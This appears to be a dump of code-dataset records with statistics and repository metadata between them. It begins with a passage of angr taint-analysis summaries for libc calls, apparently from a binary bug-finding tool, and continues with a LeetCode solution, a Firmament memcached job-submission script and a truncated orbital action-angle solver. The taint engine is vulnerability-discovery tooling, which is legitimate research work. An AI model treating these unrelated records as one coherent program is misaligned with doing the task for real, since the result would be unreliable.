# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcpy_sized(_core, call_site_path, plt_path):
"""
memcpy-like sized (e.g., memcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
# if the second parameter is tainted (or pointing to a tainted location)
# or the third is tainted, we taint the first too
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
dst_loaded = _core.safe_load(plt_path, dst)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
reg_n = arg_reg_name(p, 2)
n = getattr(plt_path.active[0].regs, reg_n)
# n_loaded = _core.safe_load(plt_path_cp, size)
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
# TODO take N into account
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
# untaint if the size is constrained
if (_core.is_tainted(dst, path=plt_path) or
_core.is_tainted(dst_loaded, path=plt_path)) and \
not _core.is_tainted(n, path=plt_path):
# do untaint
_core.do_recursive_untaint(dst_loaded, plt_path)
def memcpy_unsized(_core, call_site_path, plt_path):
"""
memcpy-like unsize (e.g., strcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
# dst_loaded = _core.safe_load(plt_path_cp, dst, estimate_size=True)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
# run the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
def is_size_taint(v):
return '__size__' in str(v)
def sizeof(_core, call_site_path, plt_path):
"""
sizeof-like (e.g., strlen) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
n = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
    cnt = _core.safe_load(plt_path, n, _core.taint_buf_size // 8)
# use the sim procedure to continue to the next state and add constraints
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "sizeof: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
return_value = getattr(plt_path.active[0].regs, ret_reg_name(p))
# TODO: check if the constraints set by angr sim procedure are correct
# if there is a tainted buffer in one of the registers then also taint this variable
if _core.is_tainted(cnt, path=plt_path) or _core.is_tainted(n, path=plt_path):
t = _core.get_sym_val(name=(_core.taint_buf + '__size__'), bits=p.arch.bits).reversed
_core.add_taint_glob_dep(t, cnt, plt_path)
# constrain output of this variable equal to the output of sizeof and add it to the return register
plt_path.active[0].add_constraints(return_value == t)
setattr(plt_path.active[0].regs, ret_reg_name(p), t)
#
# Heap functions
#
def _malloc(_core, _, plt_path):
"""
    malloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
setattr(state.regs, arg_reg_name(p, 0), size)
# use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "malloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def _realloc(_core, _, plt_path):
"""
realloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 1))
# ptr = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
setattr(state.regs, arg_reg_name(p, 0), size)
# if the size is not tainted, use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "realloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def heap_alloc(_core, call_site_path, plt_path):
"""
Heap allocation function stub
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
sim_size = None
if fname == 'malloc':
sim_size = _malloc(_core, call_site_path, plt_path)
elif fname == 'realloc':
sim_size = _realloc(_core, call_site_path, plt_path)
else:
print(f"Implement this heap alloc: {fname}")
if sim_size is not None:
taint_args = [l for l in sim_size.recursive_leaf_asts if _core.is_tainted(l, call_site_path)]
if taint_args and len(set(taint_args)) == 1:
arg = taint_args[0]
if is_size_taint(arg):
_core.do_recursive_untaint(arg, plt_path)
#
# Env function
#
env_var = {}
def _setenv(_core, _, plt_path):
"""
setenv function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
# add the environment variable to the list of env_variables with this key
key = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
env_var[str(key)] = getattr(plt_path.active[0].regs, arg_reg_name(p, 1))
# this call can continue with an empty sim procedure since it does nothing
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
def _getenv(_core, call_site_addr, plt_path):
"""
getenv function summary
:param _core: core taint engine
:param call_site_addr: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
env_var_size = _core.taint_buf_size
reg = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
cnt_mem = _core.safe_load(plt_path, reg)
key = str(reg)
# this info is passed by some user controllable source
if _core.is_tainted(reg, path=plt_path) or _core.is_tainted(cnt_mem, path=plt_path):
to_store = _core.get_sym_val(name=_core.taint_buf, bits=env_var_size)
# it was set before
elif key in env_var:
to_store = env_var[key]
# fresh symbolic var
else:
to_store = _core.get_sym_val(name="env_var", bits=env_var_size)
# store the symbolic buffer at the memory address
addr = plt_path.active[0].heap.allocate(env_var_size)
plt_path.active[0].memory.store(addr, to_store)
# use an empty hook as sim procedure to continue with the program
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
# set the return address to the pointer
setattr(plt_path.active[0].regs, ret_reg_name(p), addr)
def env(_core, call_site_path, plt_path):
"""
Summarize environment functions (getenv, and setenv)
    :param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return:
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
if fname == 'setenv':
_setenv(_core, call_site_path, plt_path)
elif fname == 'getenv':
_getenv(_core, call_site_path, plt_path)
else:
print(f"Implement this Env function: {fname}")
# return the env_var if tainted to store for bug_finders
#
# Numerical
#
def atoi(_core, _, plt_path):
p = _core.p
state = plt_path.active[0]
val = getattr(state.regs, arg_reg_name(p, 0))
if _core.is_or_points_to_tainted_data(val, plt_path):
addr = plt_path.active[0].memory.load(val, p.arch.bytes)
_core.do_recursive_untaint(addr, plt_path)
plt_path.step().step()
| 34.100703 | 117 | 0.665614 | 2,280 | 14,561 | 3.982895 | 0.114474 | 0.099438 | 0.057262 | 0.057042 | 0.700914 | 0.683295 | 0.665896 | 0.642881 | 0.619095 | 0.608964 | 0 | 0.007723 | 0.235286 | 14,561 | 426 | 118 | 34.180751 | 0.807813 | 0.291189 | 0 | 0.59596 | 0 | 0 | 0.105688 | 0 | 0 | 0 | 0 | 0.004695 | 0.035354 | 1 | 0.075758 | false | 0.005051 | 0.005051 | 0.005051 | 0.10101 | 0.010101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa1ecc00932000826e0af0c980cbcdd6a456cc46 | 926 | py | Python | python/091-100/Interleaving String.py | KaiyuWei/leetcode | fd61f5df60cfc7086f7e85774704bacacb4aaa5c | [
"MIT"
] | 150 | 2015-04-04T06:53:49.000Z | 2022-03-21T13:32:08.000Z | python/091-100/Interleaving String.py | yizhu1012/leetcode | d6fa443a8517956f1fcc149c8c4f42c0ad93a4a7 | [
"MIT"
] | 1 | 2015-04-13T15:15:40.000Z | 2015-04-21T20:23:16.000Z | python/091-100/Interleaving String.py | yizhu1012/leetcode | d6fa443a8517956f1fcc149c8c4f42c0ad93a4a7 | [
"MIT"
] | 64 | 2015-06-30T08:00:07.000Z | 2022-01-01T16:44:14.000Z | class Solution:
# @param {string} s1
# @param {string} s2
# @param {string} s3
# @return {boolean}
def isInterleave(self, s1, s2, s3):
m = len(s1)
n = len(s2)
if m+n != len(s3):
return False
table = [([False] * (m+1)) for i in range(n+1)]
table[0][0] = True
for i in range (1, m+1):
if s3[i-1] == s1[i-1] and table[0][i-1] == True:
table[0][i] = True
for i in range (1, n+1):
if s3[i-1] == s2[i-1] and table[i-1][0] == True:
table[i][0] = True
for i in range (1, n+1):
for j in range(1, m+1):
if s3[i+j-1] == s2[i-1] and table[i-1][j] == True:
table[i][j] = True
if s3[i+j-1] == s1[j-1] and table[i][j-1] == True:
table[i][j] = True
return table[n][m] | 33.071429 | 66 | 0.402808 | 148 | 926 | 2.52027 | 0.182432 | 0.042895 | 0.064343 | 0.117962 | 0.402145 | 0.284182 | 0.284182 | 0.257373 | 0 | 0 | 0 | 0.083799 | 0.420086 | 926 | 28 | 67 | 33.071429 | 0.610801 | 0.079914 | 0 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
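The same DP can be exercised standalone (a self-contained restatement of the method above, tested on the canonical LeetCode inputs):

```python
def is_interleave(s1, s2, s3):
    m, n = len(s1), len(s2)
    if m + n != len(s3):
        return False
    # table[i][j]: can s3[:i+j] be formed by interleaving s1[:j] and s2[:i]?
    table = [[False] * (m + 1) for _ in range(n + 1)]
    table[0][0] = True
    for j in range(1, m + 1):
        table[0][j] = table[0][j - 1] and s3[j - 1] == s1[j - 1]
    for i in range(1, n + 1):
        table[i][0] = table[i - 1][0] and s3[i - 1] == s2[i - 1]
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            table[i][j] = ((table[i - 1][j] and s3[i + j - 1] == s2[i - 1]) or
                           (table[i][j - 1] and s3[i + j - 1] == s1[j - 1]))
    return table[n][m]

print(is_interleave("aabcc", "dbbca", "aadbbcbcac"))  # True
print(is_interleave("aabcc", "dbbca", "aadbbbaccc"))  # False
```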
aa2716777e5784947bfab68b664551c0c517f631 | 4,540 | py | Python | scripts/job/memcached_submit.py | Container-Projects/firmament | d0de5258f0805f8d17b45d70c0a8e6d6a67617c0 | [
"Apache-2.0",
"OpenSSL"
] | 287 | 2016-05-13T17:45:48.000Z | 2022-01-23T00:26:20.000Z | scripts/job/memcached_submit.py | Container-Projects/firmament | d0de5258f0805f8d17b45d70c0a8e6d6a67617c0 | [
"Apache-2.0",
"OpenSSL"
] | 33 | 2016-05-13T11:40:21.000Z | 2020-11-16T17:57:17.000Z | scripts/job/memcached_submit.py | Container-Projects/firmament | d0de5258f0805f8d17b45d70c0a8e6d6a67617c0 | [
"Apache-2.0",
"OpenSSL"
] | 64 | 2016-05-26T06:35:39.000Z | 2021-09-27T12:02:44.000Z | from base import job_desc_pb2
from base import task_desc_pb2
from base import reference_desc_pb2
from google.protobuf import text_format
import httplib, urllib, re, sys, random
import binascii
import time
import shlex
def add_worker_task(job_name, task, binary, args, worker_id, num_workers, extra_args):
task.uid = 0
task.name = "%s/%d" % (job_name, worker_id)
task.state = task_desc_pb2.TaskDescriptor.CREATED
task.binary = "/usr/bin/python"
task.args.extend(args)
task.args.append(str(worker_id))
task.args.append(str(num_workers))
task.args.append(binary)
task.args.extend(extra_args)
task.inject_task_lib = True
if len(sys.argv) < 4:
print "usage: memcached_submit.py <coordinator hostname> <web UI port> " \
"<task binary> [<args>] [<num workers>] [<job name>]"
sys.exit(1)
hostname = sys.argv[1]
port = int(sys.argv[2])
memcached_exe = sys.argv[3]
if len(sys.argv) > 4:
extra_args = shlex.split(sys.argv[4])
else:
extra_args = []
if len(sys.argv) > 5:
num_workers = int(sys.argv[5])
else:
num_workers = 1
if len(sys.argv) > 6:
job_name = sys.argv[6]
else:
job_name = "memcached_job_at_%d" % (int(time.time()))
basic_args = []
basic_args.append("/home/srguser/firmament-experiments/helpers/napper/napper_memcached.py")
basic_args.append("caelum-301:2181")
basic_args.append(job_name)
job_desc = job_desc_pb2.JobDescriptor()
job_desc.uuid = "" # UUID will be set automatically on submission
job_desc.name = job_name
# set up root task
job_desc.root_task.uid = 0
job_desc.root_task.name = job_name + "/0"
job_desc.root_task.state = task_desc_pb2.TaskDescriptor.CREATED
job_desc.root_task.binary = "/usr/bin/python"
job_desc.root_task.args.extend(basic_args)
job_desc.root_task.args.append("0") # root task is worker ID 0
job_desc.root_task.args.append(str(num_workers))
job_desc.root_task.args.append(memcached_exe)
job_desc.root_task.args.extend(extra_args)
job_desc.root_task.inject_task_lib = True
# add workers
for i in range(1, num_workers):
task = job_desc.root_task.spawned.add()
add_worker_task(job_name, task, memcached_exe, basic_args, i, num_workers, extra_args)
input_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
output_id = binascii.unhexlify('db33daba280d8e68eea6e490723b02cedb33daba280d8e68eea6e490723b02ce')
output2_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
job_desc.output_ids.append(output_id)
job_desc.output_ids.append(output2_id)
input_desc = job_desc.root_task.dependencies.add()
input_desc.id = input_id
input_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
input_desc.type = reference_desc_pb2.ReferenceDescriptor.CONCRETE
input_desc.non_deterministic = False
input_desc.location = "blob:/tmp/fib_in"
final_output_desc = job_desc.root_task.outputs.add()
final_output_desc.id = output_id
final_output_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output_desc.non_deterministic = True
final_output_desc.location = "blob:/tmp/out1"
final_output2_desc = job_desc.root_task.outputs.add()
final_output2_desc.id = output2_id
final_output2_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output2_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output2_desc.non_deterministic = True
final_output2_desc.location = "blob:/tmp/out2"
#params = urllib.urlencode({'test': text_format.MessageToString(job_desc)})
params = 'jd=%s' % text_format.MessageToString(job_desc)
print "SUBMITTING job with parameters:"
print params
print ""
try:
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("%s:%s" % (hostname, port))
conn.request("POST", "/job/submit/", params, headers)
response = conn.getresponse()
except Exception as e:
print "ERROR connecting to coordinator: %s" % (e)
sys.exit(1)
data = response.read()
match = re.search(r"([0-9a-f\-]+)", data, re.MULTILINE | re.S | re.I | re.U)
print "----------------------------------------------"
if match and response.status == 200:
job_id = match.group(1)
print "JOB SUBMITTED successfully!\nJOB ID is %s\nStatus page: " \
"http://%s:%d/job/status/?id=%s" % (job_id, hostname, port, job_id)
else:
print "ERROR submitting job -- response was: %s (Code %d)" % (response.reason,
response.status)
print "----------------------------------------------"
conn.close()
| 36.910569 | 99 | 0.745154 | 658 | 4,540 | 4.905775 | 0.264438 | 0.049876 | 0.047708 | 0.065056 | 0.349133 | 0.208798 | 0.129492 | 0.0886 | 0 | 0 | 0 | 0.022139 | 0.114537 | 4,540 | 122 | 100 | 37.213115 | 0.780846 | 0.037885 | 0 | 0.07619 | 0 | 0 | 0.199679 | 0.088721 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.07619 | null | null | 0.085714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa276bd863f21ed290ee913192b1706b7cc21ea2 | 16,059 | py | Python | gala/dynamics/_genfunc/genfunc_3d.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | 1 | 2021-10-14T03:36:15.000Z | 2021-10-14T03:36:15.000Z | gala/dynamics/_genfunc/genfunc_3d.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | gala/dynamics/_genfunc/genfunc_3d.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | # Solving the series of linear equations for true action
# and generating function Fourier components
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from matplotlib.ticker import MaxNLocator
import matplotlib.cm as cm
import time
# in units kpc, km/s and 10^11 M_solar
Grav = 430091.7270069976
Conv = 0.9777922216
import toy_potentials as toy
import test_potentials as pot
import solver
import visualize_surfaces as vs
from solver import unroll_angles as ua
def choose_NT(N_max,iffreq=True):
""" calculates number of time samples required to constrain N_max modes
--- equation (21) from Sanders & Binney (2014) """
if(iffreq):
        return max(200,9*N_max**3//4)
    else:
        return max(100,N_max**3//2)
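For instance, a standalone restatement of the criterion (hypothetical usage, with integer arithmetic made explicit):

```python
def choose_NT(N_max, iffreq=True):
    # Restatement of the sampling criterion above (eq. 21, Sanders & Binney 2014)
    if iffreq:
        return max(200, 9 * N_max**3 // 4)
    return max(100, N_max**3 // 2)

print(choose_NT(6))                  # 486 samples when frequencies are also fitted
print(choose_NT(6, iffreq=False))    # 108
print(choose_NT(2))                  # 200 (floor of 200 samples applies)
```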
def check_angle_solution(ang,n_vec,toy_aa,timeseries):
""" Plots the toy angle solution against the toy angles ---
Takes true angles and frequencies ang,
the Fourier vectors n_vec,
the toy action-angles toy_aa
and the timeseries """
f,a=plt.subplots(3,1)
for i in range(3):
a[i].plot(toy_aa.T[i+3],'.')
        size = len(ang[6:])//3
AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
a[i].plot((ang[i]+ang[i+3]*timeseries-2.*AA) % (2.*np.pi),'.')
a[i].set_ylabel(r'$\theta$'+str(i+1))
a[2].set_xlabel(r'$t$')
plt.show()
def check_target_angle_solution(ang,n_vec,toy_aa,timeseries):
""" Plots the angle solution and the toy angles ---
Takes true angles and frequencies ang,
the Fourier vectors n_vec,
the toy action-angles toy_aa
and the timeseries """
f,a=plt.subplots(3,1)
for i in range(3):
# a[i].plot(toy_aa.T[i+3],'.')
        size = len(ang[6:])//3
AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
a[i].plot(((toy_aa.T[i+3]+2.*AA) % (2.*np.pi))-(ang[i]+timeseries*ang[i+3]) % (2.*np.pi),'.')
a[i].plot(toy_aa.T[i+3],'.')
a[i].set_ylabel(r'$\theta$'+str(i+1))
a[2].set_xlabel(r'$t$')
plt.show()
def eval_mean_error_functions(act,ang,n_vec,toy_aa,timeseries,withplot=False):
""" Calculates sqrt(mean(E)) and sqrt(mean(F)) """
Err = np.zeros(6)
NT = len(timeseries)
    size = len(ang[6:])//3
UA = ua(toy_aa.T[3:].T,np.ones(3))
fig,axis=None,None
if(withplot):
fig,axis=plt.subplots(3,2)
plt.subplots_adjust(wspace=0.3)
for K in range(3):
ErrJ = np.array([(i[K]-act[K]-2.*np.sum(n_vec.T[K]*act[3:]*np.cos(np.dot(n_vec,i[3:]))))**2 for i in toy_aa])
Err[K] = np.sum(ErrJ)
ErrT = np.array(((ang[K]+timeseries*ang[K+3]-UA.T[K]-2.*np.array([np.sum(ang[6+K*size:6+(K+1)*size]*np.sin(np.sum(n_vec*i,axis=1))) for i in toy_aa.T[3:].T])))**2)
Err[K+3] = np.sum(ErrT)
if(withplot):
axis[K][0].plot(ErrJ,'.')
axis[K][0].set_ylabel(r'$E$'+str(K+1))
axis[K][1].plot(ErrT,'.')
axis[K][1].set_ylabel(r'$F$'+str(K+1))
if(withplot):
for i in range(3):
axis[i][0].set_xlabel(r'$t$')
axis[i][1].set_xlabel(r'$t$')
plt.show()
EJ = np.sqrt(Err[:3]/NT)
ET = np.sqrt(Err[3:]/NT)
return np.array([EJ,ET])
def box_actions(results, times, N_matrix, ifprint):
"""
Finds actions, angles and frequencies for box orbit.
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
"""
if(ifprint):
print("\n=====\nUsing triaxial harmonic toy potential")
t = time.time()
# Find best toy parameters
omega = toy.findbestparams_ho(results)
if(ifprint):
print("Best omega "+str(omega)+" found in "+str(time.time()-t)+" seconds")
# Now find toy actions and angles
AA = np.array([toy.angact_ho(i,omega) for i in results])
AA = AA[~np.isnan(AA).any(1)]
if(len(AA)==0):
return
t = time.time()
act = solver.solver(AA, N_matrix)
    if act is None:
return
if(ifprint):
print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")
np.savetxt("GF.Sn_box",np.vstack((act[1].T,act[0][3:])).T)
ang = solver.angle_solver(AA,times,N_matrix,np.ones(3))
if(ifprint):
print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Just some checks
if(len(ang)>len(AA)):
print("More unknowns than equations")
return act[0], ang, act[1], AA, omega
def loop_actions(results, times, N_matrix, ifprint):
"""
Finds actions, angles and frequencies for loop orbit.
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
results must be oriented such that circulation is about the z-axis
"""
if(ifprint):
print("\n=====\nUsing isochrone toy potential")
t = time.time()
# First find the best set of toy parameters
params = toy.findbestparams_iso(results)
    if params[0] != params[0]:  # NaN check: findbestparams_iso failed
        params = np.array([10., 10.])
if(ifprint):
print("Best params "+str(params)+" found in "+str(time.time()-t)+" seconds")
# Now find the toy angles and actions in this potential
AA = np.array([toy.angact_iso(i,params) for i in results])
AA = AA[~np.isnan(AA).any(1)]
if(len(AA)==0):
return
t = time.time()
act = solver.solver(AA, N_matrix,symNx = 1)
    if act is None:
return
if(ifprint):
print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Store Sn
np.savetxt("GF.Sn_loop",np.vstack((act[1].T,act[0][3:])).T)
# Find angles
sign = np.array([1.,np.sign(results[0][0]*results[0][4]-results[0][1]*results[0][3]),1.])
ang = solver.angle_solver(AA,times,N_matrix,sign,symNx = 1)
if(ifprint):
print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Just some checks
if(len(ang)>len(AA)):
print("More unknowns than equations")
return act[0], ang, act[1], AA, params
def angmom(x):
""" returns angular momentum vector of phase-space point x"""
return np.array([x[1]*x[5]-x[2]*x[4],x[2]*x[3]-x[0]*x[5],x[0]*x[4]-x[1]*x[3]])
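As a quick sanity check, `angmom` is just the cross product r × v of the position and velocity halves of the phase-space point, so it can be verified against `np.cross`. A minimal sketch (the sample point is made up):

```python
import numpy as np

def angmom(x):
    # r x v for a phase-space point x = (x, y, z, vx, vy, vz)
    return np.cross(x[:3], x[3:])

# Hypothetical phase-space point (positions in kpc, velocities in km/s)
point = np.array([10., 1., 8., 40., 152., 63.])
L = angmom(point)
print(L)  # equals [y*vz - z*vy, z*vx - x*vz, x*vy - y*vx]
```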
def assess_angmom(X):
"""
Checks for change of sign in each component of the angular momentum.
Returns an array with ith entry 1 if no sign change in i component
and 0 if sign change.
Box = (0,0,0)
S.A loop = (0,0,1)
L.A loop = (1,0,0)
"""
L=angmom(X[0])
loop = np.array([1,1,1])
for i in X[1:]:
L0 = angmom(i)
if(L0[0]*L[0]<0.):
loop[0] = 0
if(L0[1]*L[1]<0.):
loop[1] = 0
if(L0[2]*L[2]<0.):
loop[2] = 0
return loop
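The classification logic above can be exercised on a synthetic orbit. This sketch uses a hypothetical near-planar orbit: circulation about the z-axis plus a small vertical wobble, so L_x and L_y flip sign along the orbit while L_z keeps a fixed sign, giving the short-axis-loop signature (0,0,1) from the docstring:

```python
import numpy as np

def angmom(x):
    return np.cross(x[:3], x[3:])

def assess_angmom(X):
    # 1 if the i-th angular momentum component never flips sign
    # relative to the first point, else 0 (same logic as above)
    L = angmom(X[0])
    loop = np.array([1, 1, 1])
    for x in X[1:]:
        loop[angmom(x) * L < 0.] = 0
    return loop

# Hypothetical orbit: unit circle in the x-y plane with a small z oscillation
t = np.linspace(0.1, 0.1 + 2. * np.pi, 200)
X = np.column_stack([np.cos(t), np.sin(t), 0.1 * np.cos(3. * t),
                     -np.sin(t), np.cos(t), -0.3 * np.sin(3. * t)])
print(assess_angmom(X))  # [0 0 1] -> short-axis loop
```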
def flip_coords(X,loop):
""" Align circulation with z-axis """
if(loop[0]==1):
        return np.array([np.array([i[2], i[1], i[0], i[5], i[4], i[3]]) for i in X])
else:
return X
def find_actions(results, t, N_matrix=8, use_box=False, ifloop=False, ifprint = True):
"""
Main routine:
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) where act is the actions, ang the initial angles and
frequencies, n_vec the n vectors of the Fourier modes, toy_aa the toy action-angle
coords, and pars are the toy potential parameters
N_matrix sets the maximum |n| of the Fourier modes used,
use_box forces the routine to use the triaxial harmonic oscillator as the toy potential,
ifloop=True returns orbit classification,
ifprint=True prints progress messages.
"""
# Determine orbit class
loop = assess_angmom(results)
arethereloops = np.any(loop>0)
if(arethereloops and not use_box):
L = loop_actions(flip_coords(results,loop),t,N_matrix, ifprint)
        if L is None:
            if ifprint:
                print("Failed to find actions for this orbit")
            return
# Used for switching J_2 and J_3 for long-axis loop orbits
# This is so the orbit classes form a continuous plane in action space
# if(loop[0]):
# L[0][1],L[0][2]=L[0][2],L[0][1]
# L[1][1],L[1][2]=L[1][2],L[1][1]
# L[1][4],L[1][5]=L[1][5],L[1][4]
# L[3].T[1],L[3].T[2]=L[3].T[2],L[3].T[1]
else:
L = box_actions(results,t,N_matrix, ifprint)
        if L is None:
            if ifprint:
                print("Failed to find actions for this orbit")
            return
if(ifloop):
return L,loop
else:
return L
###################
# Plotting tests #
###################
from solver import check_each_direction as ced
def plot_Sn_timesamples(PSP):
""" Plots Fig. 5 from Sanders & Binney (2014) """
TT = pot.stackel_triax()
f,a = plt.subplots(2,1,figsize=[3.32,3.6])
plt.subplots_adjust(hspace=0.,top=0.8)
LowestPeriod = 2.*np.pi/38.86564386
Times = np.array([2.,4.,8.,12.])
Sr = np.arange(2,14,2)
# Loop over length of integration window
for i,P,C in zip(Times,['.','s','D','^'],['k','r','b','g']):
diffact = np.zeros((len(Sr),3))
difffreq = np.zeros((len(Sr),3))
MAXGAPS = np.array([])
# Loop over N_max
for k,j in enumerate(Sr):
NT = choose_NT(j)
timeseries=np.linspace(0.,i*LowestPeriod,NT)
results = odeint(pot.orbit_derivs2,PSP,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
